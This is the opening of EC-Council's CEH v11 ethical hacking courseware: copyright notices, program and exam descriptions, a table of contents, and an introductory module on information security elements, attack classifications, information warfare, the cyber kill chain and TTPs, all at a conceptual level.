Ceh11 Book


Ethical Hacking and Countermeasures
Version 11
EC-Council
Copyright © 2020 by EC-Council. All rights reserved. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but may not be reproduced for publication without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to EC-Council, addressed "Attention: EC-Council," at the address below:

EC-Council
New Mexico
201 Sun Ave NE
Albuquerque, NM 87109

Information contained in this publication has been obtained by EC-Council from sources believed to be reliable. EC-Council takes reasonable measures to ensure that the content is current and accurate; however, because of the possibility of human or mechanical error, we do not guarantee the accuracy, adequacy, or completeness of any information and are not responsible for any errors or omissions nor for the accuracy of the results obtained from use of such information.

The courseware is a result of extensive research and contributions from subject-matter experts from all over the world. Due credits for all such contributions and references are given in the courseware in the research endnotes. We are committed to protecting intellectual property rights.
If you are a copyright owner (an exclusive licensee or their agent) and you believe that any part of the courseware constitutes an infringement of copyright, or a breach of an agreed license contract, you may notify us at legal@eccouncil.org. In the event of a justified complaint, EC-Council will remove the material in question and make necessary rectifications.

The courseware may contain references to other information resources and security solutions, but such references should not be considered as an endorsement of or recommendation by EC-Council.

Readers are encouraged to report errors, omissions, and inaccuracies to EC-Council at legal@eccouncil.org. If you have any issues, please contact us at support@eccouncil.org.

NOTICE TO THE READER

EC-Council does not warrant or guarantee any of the products, methodologies, or frameworks described herein nor does it perform any independent analysis in connection with any of the product information contained herein. EC-Council does not assume, and expressly disclaims, any obligation to obtain and include information other than that provided to it by the manufacturer. The reader is expressly warned to consider and adopt all safety precautions that might be indicated by the activities described herein and to avoid all potential hazards. By following the instruction contained herein, the reader willingly assumes all risks in connection with such instructions. EC-Council makes no representations or warranties of any kind, including but not limited to the warranties of fitness for particular purpose or merchantability, nor are any such representations implied with respect to the material set forth herein, and EC-Council takes no responsibility with respect to such material. EC-Council shall not be liable for any special, consequential, or exemplary damages resulting, in whole or in part, from the reader's use of or reliance upon this

Ethical Hacking and Countermeasures Copyright © by EC-Council
Foreword

Since you are reading this CEH v11 courseware, you most likely realize the importance of information systems security. However, we would like to put forth our motive behind compiling a resource such as this one. You might find yourself asking what sets this course apart from the others out there and what you can gain from this course. The truth is that no single courseware can address all the issues of information security in a detailed manner. Moreover, the rate at which exploits, tools, and methods are discovered by the security community makes it difficult for one program to cover all the necessary facets of information security. This doesn't mean that this course is inadequate in any way, as we have worked to cover all major domains in such a manner that the reader will be able to appreciate the way security has evolved over time as well as gain insight into the fundamental workings relevant to each domain. It is a blend of academic and practical wisdom supplemented with tools that the reader can readily access in order to obtain a hands-on experience.

The emphasis throughout the courseware is on gaining practical know-how, which explains the stress on free and accessible tools. You will read about some of the most widespread attacks seen, the popular tools used by attackers, and how attacks have been carried out using ordinary resources.

You may also want to know what to expect once you have completed the course. This courseware is a resource material. Any penetration tester can tell you that there is no one straight methodology or sequence of steps that you can follow while auditing a client site. There is no one template that will meet all your needs. Your testing strategy will vary with the client, the basic information about the system or situation, and the resources at your disposal. However, for each stage you choose, be it enumeration, firewall penetration, or other domains, you will find something in this courseware that you can definitely use.

Finally, this is not the end! This courseware is to be considered a constant work-in-progress because we will be adding value to this courseware over time. You may find some aspects extremely detailed, while others may have less detail. We are constantly asking ourselves if the content helps explain the core point of the lesson, and we constantly calibrate our material with that in mind. We would love to hear your viewpoints and suggestions, so please send us your feedback to help in our quest to constantly improve our courseware.
About the EC-Council CEH Program

If you want to stop hackers from invading your network, first you've got to invade their minds.

Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value, and completely erase their tracks.

The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself, all the while staying within legal limits. This philosophy stems from the proven practice of trying to catch a thief by thinking like a thief. As technology advances and organizations depend on technology increasingly, information assets have evolved into critical components of survival.

If hacking involves creativity and thinking 'out-of-the-box', then vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organizations have adequately protected their information assets, they must adopt the approach of 'defense in depth'. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure.

An Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When it is done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target.

The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

To achieve the Certified Ethical Hacker Certification, you must pass the CEH exam 312-50.

Please visit https://www.eccouncil.org/programs/certified-ethical-hacker-ceh_ for more information.

Course Prerequisites

It is highly recommended that candidates pursuing this course have a fundamental understanding of operating systems, file systems, computer networks, TCP/IP protocols, information security controls, basic network troubleshooting, data leakage, data backup, and risk management.
About EC-Council

The International Council of Electronic Commerce Consultants, better known as EC-Council, was founded in late 2001 to address the need for well-educated and certified information security and e-business practitioners. EC-Council is a global, member-based organization composed of industry and subject matter experts working together to set the standards and raise the bar in information security certification and education.

EC-Council first developed the Certified Ethical Hacker (C|EH) program with the goal of teaching the methodologies, tools, and techniques used by hackers. Leveraging the collective knowledge of hundreds of subject-matter experts, the CEH program has rapidly gained popularity around the world and is now delivered in more than 145 countries by more than 950 authorized training centers. It is considered as the benchmark for many government entities and major corporations around the globe.

EC-Council, through its impressive network of professionals and huge industry following, also developed a range of other leading programs in information security and e-business. EC-Council certifications are viewed as the essential certifications needed when standard configuration and security policy courses fall short. Providing a true, hands-on, tactical approach to security, individuals armed with the knowledge disseminated by EC-Council programs are tightening security networks around the world and beating hackers at their own game.

Other EC-Council Programs

Security Awareness: Certified Secure Computer User

The purpose of the CSCU training program is to provide students with
Network Defense: Certified Network Defender

Students enrolled in the Certified Network Defender course will gain a

technologies so that students may understand how networks operate, how automation software behaves, and how to analyze networks and their defense. Students will learn how to protect, detect, and respond to the network attacks as well as learning about network defense fundamentals, the application of network security controls, protocols, perimeter appliances, secure IDS, VPN, and firewall configuration. Students will also learn the intricacies of network traffic signature, analysis, and vulnerability scanning, which will help in designing improved network security policies and successful incident response plans. These skills will help organizations foster resiliency and operational continuity during attacks.
Penetration Testing: Certified Penetration Testing Professional

CPENT certification requires you to demonstrate the application of advanced penetration testing techniques such as advanced Windows attacks, IoT systems attacks, advanced binaries exploitation, exploits writing, bypassing a filtered network, Operational Technology (OT) pen testing, accessing hidden networks with pivoting and double pivoting, privilege escalation, and evading defense mechanisms.

EC-Council's CPENT standardizes the knowledge base for penetration testing professionals by incorporating best practices followed by experienced experts in the field. The objective of the CPENT is to ensure that each professional follows a strict code of ethics, is exposed to the best practices in the domain of penetration testing, and is aware of all the compliance requirements required by the industry.

Unlike a normal security certification, the CPENT credential provides assurance that security professionals possess skills to analyze the security posture of a network exhaustively and recommend corrective measures authoritatively. For many years EC-Council has been certifying IT Security Professionals around the globe to ensure these professionals are proficient in network defense mechanisms. EC-Council's credentials vouch for their professionalism and expertise, thereby making these professionals more sought after by organizations and consulting firms globally.
Forensics: Computer Hacking Forensic Investigator

Computer Hacking Forensic Investigator (CHFI) is a comprehensive course covering major forensic investigation scenarios. It enables students to acquire crucial hands-on experience with various forensic investigation techniques. Students learn how to utilize standard forensic tools to successfully carry out a computer forensic investigation, preparing them to better aid in the prosecution of perpetrators.

EC-Council's CHFI certifies individuals in the specific security discipline of computer forensics from a vendor-neutral perspective. The CHFI certification bolsters the applied knowledge of law enforcement personnel, system administrators, security officers, defense and military personnel, legal professionals, bankers, security professionals, and anyone who is concerned about the integrity of network infrastructures.
Incident Handling: EC-Council Certified Incident Handler

effectively handle post-breach consequences by reducing the impact of the incident, from both a financial and a reputational perspective. E|CIH is a method-driven program that uses a holistic approach to cover vast concepts concerning organizational incident handling and response, from preparing and planning the incident handling response process to recovering organizational assets after a security incident. These concepts are essential for handling and responding to security incidents to protect organizations from future threats or attacks.
Certified Chief Information Security Officer

The Certified Chief Information Security Officer (CCISO) program was developed by EC-Council to fill a knowledge gap in the information security industry. Most information security certifications focus on specific tools or practitioner capabilities. When the CCISO program was developed, no certification existed to recognize the knowledge, skills, and aptitudes required for an experienced information security professional to perform the duties of a CISO effectively and competently. In fact, at that time, many questions existed about what a CISO really was and the value this role adds to an organization. The CCISO Body of Knowledge helps to define the role of the CISO and clearly outline the contributions this person makes in an organization. EC-Council enhances this information through training opportunities conducted as instructor-led or self-study modules to ensure candidates have a complete understanding of the role. EC-Council evaluates the knowledge of CCISO candidates with a rigorous exam that tests their competence across five domains with which a seasoned security leader should be familiar.

Application Security: Certified Application Security Engineer

The Certified Application Security Engineer (CASE) credential is developed in partnership with application and software development experts globally. The CASE credential tests the critical security skills and knowledge required throughout a typical software development lifecycle (SDLC), focusing on the importance of the implementation of secure methodologies and practices in today's insecure operating environment.

The CASE training program is developed concurrently to prepare software professionals with the necessary capabilities that are expected by employers and academia globally. It is designed to be a hands-on, comprehensive application security course that will help software professionals create secure applications. The training program encompasses security activities involved in all phases of the Software Development Lifecycle (SDLC): planning, creating, testing, and deploying an application.

Unlike other application security trainings, CASE goes beyond just the guidelines on secure coding practices and includes secure requirement gathering, robust application design, and handling security issues in post-development phases of application development. This makes CASE one of the most comprehensive certifications on the market today. It is desired by software application engineers, analysts, and testers globally, and respected by hiring authorities.

Incident Handling: Certified Threat Intelligence Analyst

Certified Threat Intelligence Analyst (C|TIA) is designed and developed in collaboration with cybersecurity and threat intelligence experts across the globe to help organizations identify and mitigate business risks by converting unknown internal and external threats into known threats. It is a comprehensive, specialist-level program that teaches a structured approach for building effective threat intelligence.

In the ever-changing threat landscape, C|TIA is an essential Threat Intelligence training program for those who deal with cyber threats on a daily basis. Organizations today demand a professional-level cybersecurity threat intelligence analyst who can extract the intelligence from data by implementing various advanced strategies. Such professional-level Threat Intelligence training programs can only be achieved when the core of the curricula maps with and is compliant to government and industry published threat intelligence frameworks.

Incident Handling: Certified SOC Analyst

The Certified SOC Analyst (CSA) program is the first step to joining a security operations center (SOC). It is engineered for current and aspiring Tier I and Tier II SOC analysts to achieve proficiency in performing entry-level and intermediate-level operations. CSA is a training and credentialing program that helps the candidate

some of the most experienced trainers in the industry.

The program focuses on creating new career opportunities through extensive, meticulous knowledge with enhanced-level capabilities for dynamically contributing to a SOC team. Being an intense 3-day program, it thoroughly covers the fundamentals of SOC operations before relaying the knowledge of log management and correlation, SIEM deployment, advanced incident detection, and incident response. Additionally, the candidate will learn to manage various SOC processes and collaborate with CSIRT at the time of need.
CEH Exam Information

CEH Exam Details
Exam Title: Certified Ethical Hacker (CEH)
Exam Code: 312-50
Availability: EC-Council Exam Portal (please visit https://www.eccexam.com); VUE (please visit https://home.pearsonvue.com/eccouncil)
Duration: 4 Hours
Questions: 125
Passing Score: Please refer to https://cert.eccouncil.org/faq.html

Please visit https://cert.eccouncil.org/certified-ethical-hacker.html for more information.
Table of Contents

Module 01: Introduction to Ethical Hacking
Information Security Overview
Cyber Kill Chain Concepts
Hacking Concepts
Ethical Hacking Concepts
Information Security Controls
Information Security Laws and Standards

Module 02: Footprinting and Reconnaissance
Footprinting Concepts
Footprinting through Search Engines
Footprinting through Web Services
Footprinting through Social Networking Sites
Website Footprinting
Email Footprinting
Whois Footprinting
DNS Footprinting
Network Footprinting
Footprinting through Social Engineering
Footprinting Tools
Footprinting Countermeasures

Module 03: Scanning Networks
Network Scanning Concepts
Scanning Tools
Host Discovery
Port and Service Discovery
OS Discovery (Banner Grabbing/OS Fingerprinting)
Scanning Beyond IDS and Firewall
Draw Network Diagrams

Module 04: Enumeration
Enumeration Concepts
NetBIOS Enumeration
SNMP Enumeration
LDAP Enumeration
NTP and NFS Enumeration
SMTP and DNS Enumeration
Other Enumeration Techniques
Enumeration Countermeasures

Module 05: Vulnerability Analysis
Vulnerability Assessment Concepts
Vulnerability Classification and Assessment Types
Vulnerability Assessment Solutions and Tools
Vulnerability Assessment Reports

Module 06: System Hacking
System Hacking Concepts
Gaining Access
Escalating Privileges
Maintaining Access
Clearing Logs

Module 07: Malware Threats
Malware Concepts
APT Concepts
Trojan Concepts
Virus and Worm Concepts
Fileless Malware Concepts
Malware Analysis
Countermeasures
Anti-Malware Software

Module 08: Sniffing
Sniffing Concepts
Sniffing Technique: MAC Attacks
Sniffing Technique: DHCP Attacks
Sniffing Technique: ARP Poisoning
Sniffing Technique: Spoofing Attacks
Sniffing Technique: DNS Poisoning
Sniffing Tools
Countermeasures
Sniffing Detection Techniques

Module 09: Social Engineering
Social Engineering Concepts
Social Engineering Techniques
Insider Threats
Impersonation on Social Networking Sites
Identity Theft
Countermeasures

Module 10: Denial-of-Service
DoS/DDoS Concepts
DoS/DDoS Attack Techniques
Botnets
DDoS Case Study
DoS/DDoS Attack Tools
Countermeasures
DoS/DDoS Protection Tools

Module 11: Session Hijacking
Session Hijacking Concepts
Application Level Session Hijacking
Network Level Session Hijacking
Session Hijacking Tools
Countermeasures

Module 12: Evading IDS, Firewalls, and Honeypots
IDS, IPS, Firewall, and Honeypot Concepts
IDS, IPS, Firewall, and Honeypot Solutions
Evading IDS
Evading Firewalls
IDS/Firewall Evading Tools
Detecting Honeypots
IDS/Firewall Evasion Countermeasures

Module 13: Hacking Web Servers
Web Server Concepts
Web Server Attacks
Web Server Attack Methodology
Web Server Attack Tools
Countermeasures
Patch Management
Web Server Security Tools

Module 14: Hacking Web Applications
Web Application Concepts
Web Application Threats
Web Application Hacking Methodology
Web API, Webhooks, and Web Shell
Web Application Security

Module 15: SQL Injection
SQL Injection Concepts
Types of SQL Injection
SQL Injection Methodology
SQL Injection Tools
Evasion Techniques
Countermeasures

Module 16: Hacking Wireless Networks
Wireless Concepts
Wireless Encryption
Wireless Threats
Wireless Hacking Methodology
Wireless Hacking Tools
Bluetooth Hacking
Countermeasures
Wireless Security Tools

Module 17: Hacking Mobile Platforms
Mobile Platform Attack Vectors
Hacking Android OS
Hacking iOS
Mobile Device Management
Mobile Security Guidelines and Tools

Module 18: IoT and OT Hacking
IoT Concepts
IoT Attacks
IoT Hacking Methodology
IoT Hacking Tools
Countermeasures
OT Concepts
OT Attacks
OT Hacking Methodology
OT Hacking Tools
Countermeasures

Module 19: Cloud Computing
Cloud Computing Concepts
Container Technology
Serverless Computing
Cloud Computing Threats
Cloud Hacking
Cloud Security

Module 20: Cryptography
Cryptography Concepts
Encryption Algorithms
Cryptography Tools
Public Key Infrastructure (PKI)
Email Encryption
Disk Encryption
Cryptanalysis
Countermeasures

Glossary
References
Appendix A - Ethical Hacking Essential Concepts - I
Appendix B - Ethical Hacking Essential Concepts - II
Certified Ethical Hacker

Module 01: Introduction to Ethical Hacking
Module Objectives
+ Understanding the Elements of Information Security
+ Overview of Hacking Concepts, Types and Phases
+ Understanding Ethical Hacking Concepts and its Scope
+ Overview of Information Security Acts and Laws
Module Objectives

Attackers break into systems for various reasons and purposes. Therefore, it is important to understand how malicious hackers attack and exploit systems and the probable reasons behind those attacks. As Sun Tzu states in the Art of War, "If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat." System administrators and security professionals must guard their infrastructure against exploits by knowing the enemy—the malicious hacker(s)—who seeks to use the same infrastructure for illegal activities.

This module starts with an overview of the current security scenario and emerging threat vectors. It provides insight into the different elements of information security. Later, the module discusses hacking and ethical hacking concepts and ends with a brief discussion on information security controls and information security laws and acts.

At the end of this module, you will be able to:
+ Describe the elements of information security
+ Explain information security attacks and information warfare
+ Describe cyber kill chain methodology, TTPs, and IoCs
+ Describe hacking concepts, types, and phases
+ Explain ethical hacking concepts and scope
+ Understand information security controls (defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI/ML)
+ Know about the information security acts and laws

Module Flow

Information Security Overview
Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration, and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in other ways. To provide an understanding of how to secure such critical information resources, this module starts with an overview of information security.

This section introduces the elements of information security, classification of attacks, and information warfare.

Elements of Information Security

Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering, and disruption of information and services is kept low or tolerable.

Confidentiality
Integrity
Availability
Authenticity
Non-Repudiation
Elements of Information Security

Information security is "the state of the well-being of information and infrastructure in which the possibility of theft, tampering, or disruption of information and services is kept low or tolerable." It relies on five major elements: confidentiality, integrity, availability, authenticity, and non-repudiation.

Confidentiality
Confidentiality is the assurance that the information is accessible only to those authorized. Confidentiality breaches may occur due to improper data handling or a hacking attempt. Confidentiality controls include data classification, data encryption, and proper disposal of equipment (such as DVDs, USB drives, and Blu-ray discs).

Integrity
Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes—the assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data is not changed) and access control (which ensures that only authorized people can update, add, or delete data).

Availability
Availability is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. Measures to maintain data availability can include disk arrays for redundant systems and clustered machines, antivirus software to combat malware, and distributed denial-of-service (DDoS) prevention systems.

Authenticity
Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, and documents.

Non-Repudiation
Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.

Motives, Goals, and Objectives of Information Security Attacks

Attacks = Motive (Goal) + Method + Vulnerability

A motive originates out of the notion that the target system stores or processes something valuable, and this leads to the threat of an attack on the system.

Attackers try various tools and attack techniques to exploit vulnerabilities in a computer system or its security policy and controls in order to fulfill their motives.

Motives, Goals, and Objectives of Information Security Attacks
Attackers generally have motives (goals), and objectives behind their information security attacks. A motive originates out of the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization's business operations, to steal valuable information for the sake of curiosity, or even to exact revenge. Therefore, these motives or goals depend on the attacker's state of mind, their reason for carrying out such an activity, as well as their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or security policy and controls.

Attacks = Motive (Goal) + Method + Vulnerability

Motives behind information security attacks:
+ Disrupt business continuity
+ Perform information theft
+ Manipulating data
+ Create fear and chaos by disrupting critical infrastructures
+ Bring financial loss to the target
+ Propagate religious or political beliefs
+ Achieve a state's military objectives
+ Damage the reputation of the target
+ Take revenge
+ Demand ransom

Classification of Attacks

According to IATF, security attacks are classified into five categories: passive, active, close-in, insider, and distribution.

Passive Attacks
Passive attacks involve intercepting and monitoring network traffic and data flow on the target network and do not tamper with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect as the attacker has no active interaction with the target system or network. Passive attacks allow attackers to capture the data or files being transmitted in the network without the consent of the user. For example, an attacker can obtain information such as unencrypted data in transit, clear-text credentials, or other sensitive information that is useful in performing active attacks.

Examples of passive attacks:
o Footprinting
o Sniffing and eavesdropping
o Network traffic analysis
o Decryption of weakly encrypted traffic
Active Attacks
Active attacks tamper with the data in transit or disrupt communication or services between the systems to bypass or break into secured systems. Attackers launch attacks on the target system or network by actively sending traffic that can be detected. These attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target's internal network and gain access to a remote system to compromise the internal network.

Examples of active attacks:
o Denial-of-service (DoS) attack
o Bypassing protection mechanisms
o Malware attacks (such as viruses, worms, ransomware)
o Modification of information
o Spoofing attacks
o Replay attacks
o Password-based attacks
o Session hijacking
o Man-in-the-Middle attack
o DNS and ARP poisoning
o Compromised-key attack
o Firewall and IDS attack
o Profiling
o Arbitrary code execution
o Privilege escalation
o Backdoor access
o Cryptography attacks
o SQL injection
o XSS attacks
o Directory traversal attacks
o Exploitation of application and OS software
Close-in Attacks
Close-in attacks are performed when the attacker is in close physical proximity with the target system or network. The main goal of performing this type of attack is to gather or modify information or disrupt its access. For example, an attacker might shoulder surf user credentials. Attackers gain close proximity through surreptitious entry, open access, or both.

Examples of close-in attacks:
o Social engineering (Eavesdropping, shoulder surfing, dumpster diving, and other methods)
Insider Attacks

Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization's assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization's business operations, reputation, and profit. It is difficult to figure out an insider attack.

Examples of insider attacks:
- Eavesdropping and wiretapping
- Theft of physical devices
- Social engineering
- Data theft and spoliation
- Pod slurping
- Planting keyloggers, backdoors, or malware
Distribution Attacks

Distribution attacks occur when attackers tamper with hardware or software prior to installation. Attackers tamper with the hardware or software at its source or when it is in transit. Examples of distribution attacks include backdoors created by software or hardware vendors at the time of manufacture. Attackers leverage these backdoors to gain unauthorized access to the target information, systems, or network.
- Modification of software or hardware during production
- Modification of software or hardware during distribution

Information Warfare

Source: http://www.iwar.org.uk

The term information warfare or InfoWar refers to the use of information and communication technologies (ICT) for competitive advantages over an opponent. Examples of information warfare weapons include viruses, worms, Trojan horses, logic bombs, trap doors, nanomachines and microbes, electronic jamming, and penetration exploits and tools.

Martin Libicki divided information warfare into the following categories:
- Command and control warfare (C2 warfare): In the computer security industry, C2 warfare refers to the impact an attacker possesses over a compromised system or network that they control.
- Intelligence-based warfare: Intelligence-based warfare is a sensor-based technology that directly corrupts technological systems. According to Libicki, "intelligence-based warfare" is warfare that consists of the design, protection, and denial of systems that seek sufficient knowledge to dominate the battlespace.
- Electronic warfare: According to Libicki, electronic warfare uses radio-electronic and cryptographic techniques to degrade communication. Radio-electronic techniques attack the physical means of sending information, whereas cryptographic techniques use bits and bytes to disrupt the means of sending information.
- Psychological warfare: Psychological warfare is the use of various techniques such as propaganda and terror to demoralize one's adversary in an attempt to succeed in battle.
- Hacker warfare: According to Libicki, the purpose of this type of warfare can vary from the shutdown of systems, data errors, theft of information, theft of services, system monitoring, and false messaging to access to data. Hackers generally use viruses, logic bombs, Trojan horses, and sniffers to perform these attacks.
- Economic warfare: Libicki notes that economic information warfare can affect the economy of a business or nation by blocking the flow of information. This could be especially devastating to organizations that do a lot of business in the digital world.
- Cyberwarfare: Libicki defines cyber warfare as the use of information systems against the virtual personas of individuals or groups. It is the broadest of all information warfare. It includes information terrorism, semantic attacks (similar to hacker warfare, but instead of harming a system, it takes over the system while maintaining the perception that it is operating correctly), and simula-warfare (simulated war, for example, acquiring weapons for mere demonstration rather than actual use).

Each form of information warfare mentioned above consists of both defensive and offensive strategies.
- Defensive Information Warfare: Involves all strategies and actions to defend against attacks on ICT assets.
- Offensive Information Warfare: Involves attacks against the ICT assets of an opponent.

Figure 1.2: Block Diagram of Information Warfare

Cyber Kill Chain Concepts

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization. This model helps organizations understand the various possible threats at every stage of an attack and the necessary countermeasures to defend against such attacks. Also, this model provides security professionals with a clear insight into the attack strategy used by the adversary so that different levels of security controls can be implemented to protect the IT infrastructure of the organization.

This section discusses the cyber kill chain methodology, common TTPs used by adversaries, behavioral identification of adversaries, and Indicators of Compromise (IoCs).

Cyber Kill Chain Methodology

The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. This methodology helps security professionals in identifying the steps that adversaries follow in order to accomplish their goals. The cyber kill chain is a framework developed for securing cyberspace based on the concept of military kill chains. This method aims to actively enhance intrusion detection and response. The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats.

According to Lockheed Martin, cyberattacks might occur in seven different phases, from reconnaissance to the final accomplishment of the objective. An understanding of the cyber kill chain methodology helps security professionals to leverage security controls at different stages of an attack and helps them to prevent the attack before it succeeds. It also provides greater insight into the attack phases, which helps in understanding the adversary's TTPs beforehand.

Discussed below are the various phases included in the cyber kill chain methodology:

Reconnaissance

An adversary performs reconnaissance to collect as much information about the target as possible to probe for weak points before actually attacking. They look for information such as publicly available information on the Internet, network information, system information, and the organizational information of the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools to obtain information such as open ports and services, vulnerabilities in applications, and login credentials. Such information can help the adversary in gaining backdoor access to the target network.

Activities of the adversary include the following:
- Gathering information about the target organization by searching the Internet or through social engineering
- Performing analysis of various online activities and publicly available information
- Gathering information from social networking sites and web services
- Obtaining information about websites visited
- Monitoring and analyzing the target organization's website
- Performing Whois, DNS, and network footprinting
- Performing scanning to identify open ports and services
Weaponization

The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary.

The following are the activities of the adversary:
- Identifying an appropriate malware payload based on the analysis
- Creating a new malware payload or selecting, reusing, or modifying the available malware payloads based on the identified vulnerability
- Creating a phishing email campaign
- Leveraging exploit kits and botnets
Delivery

The previous stage included creating a weapon. Its payload is transmitted to the intended victim(s) as an email attachment, via a malicious link on websites, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not.

The following are the activities of the adversary:
- Sending phishing emails to employees of the target organization
- Distributing USB drives containing malicious payload to employees of the target organization
- Performing attacks such as watering hole on the compromised website
- Implementing various hacking tools against the operating systems, applications, and servers of the target organization
Exploitation

After the weapon is transmitted to the intended victim, exploitation triggers the adversary's malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration.

Activities of the adversary include the following:
- Exploiting software or hardware vulnerabilities to gain remote access to the target system
Installation

The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor to gain remote access. After the injection of the malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. Also, the adversary tries to hide the presence of malicious activities from security controls like firewalls using various techniques such as encryption.

The following are the activities of the adversary:
- Downloading and installing malicious software such as backdoors
- Gaining remote access to the target system
- Leveraging various methods to keep the backdoor hidden and running
- Maintaining access to the target system
Command and Control

The adversary creates a command and control channel, which establishes two-way communication between the victim's system and an adversary-controlled server to communicate and pass data back and forth. The adversaries implement techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network.

The following are the activities of the adversary:
- Establishing a two-way communication channel between the victim's system and the adversary-controlled server
- Leveraging channels such as web traffic, email communication, and DNS messages
- Applying privilege escalation techniques
- Hiding any evidence of compromise using techniques such as encryption
Actions on Objectives

The adversary controls the victim's system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts the services or network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. Also, the adversary may use this as a launching point to perform other attacks.
Tactics, Techniques, and Procedures (TTPs)
The terms "tactics, techniques, and procedures" refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors. TTPs are helpful in analyzing threats and profiling threat actors and can further be used to strengthen the security infrastructure of an organization. The word "tactics" is defined as a guideline that describes the way an attacker performs their attack from beginning to end. The word "techniques" is defined as the technical methods used by an attacker to achieve intermediate results during their attack. Finally, the word "procedures" is defined as the organizational approach followed by the threat actors to launch their attack. In order to understand and defend against the threat actors, it is important to understand the TTPs used by adversaries. Understanding the tactics of an attacker helps to predict and detect evolving threats in the early stages. Understanding the techniques used by attackers helps to identify vulnerabilities and implement defensive measures in advance. Lastly, analyzing the procedures used by the attackers helps to identify what the attacker is looking for within the target organization's infrastructure.

Organizations should understand TTPs to protect their network against threat actors and upcoming attacks. TTPs enable the organizations to stop attacks at the initial stage, thereby protecting the network against massive damages.
Tactics

Tactics describe the way the threat actor operates during different phases of an attack. It consists of the various tactics used to gather information for the initial exploitation, perform privilege escalation and lateral movement, and deploy measures for persistent access to the system. Generally, APT groups depend on a certain set of unchanging tactics, but in some cases, they adapt to different circumstances and alter the way they perform their attacks. Therefore, the difficulty of detecting and attributing the attack campaign depends on the tactics used to perform the attack.

An organization can profile threat actors based on the tactics they use; this consists of the way they gather information about a target, the methods they follow for initial compromise, and the number of entry points they use while attempting to enter the target network.

For example, to obtain information, some threat actors depend solely on information available on the Internet, whereas others might perform social engineering or use connections in intermediate organizations. Once information such as the email addresses of employees of the target organization is gathered, the threat actors either choose to approach the target one by one or as a group. Furthermore, the attackers' payload can stay constant from the beginning to the end of the attack or may be changed based on the targeted individual. Therefore, to understand the threat actors better, the tactics used in the early stages of an attack must be analyzed properly.

Another method of analyzing the APT groups is inspecting the infrastructure and tools used to perform their attack. For example, consider establishing a command and control channel on the servers controlled by the attacker. These C&C servers may be located within a specific geographical location or may spread across the Internet and can be static or can change dynamically. It is also important to analyze the tools used to perform the attack. This includes analyzing the exploits and tools used by various APT groups. In such a scenario, a sophisticated threat actor may exploit many zero-day vulnerabilities by using adapted tools and obfuscation methods. However, this might be difficult, as less-sophisticated threat actors generally depend on publicly known vulnerabilities and open-source tools. Identifying this type of tactic helps in profiling the APT groups and building defensive measures in advance.

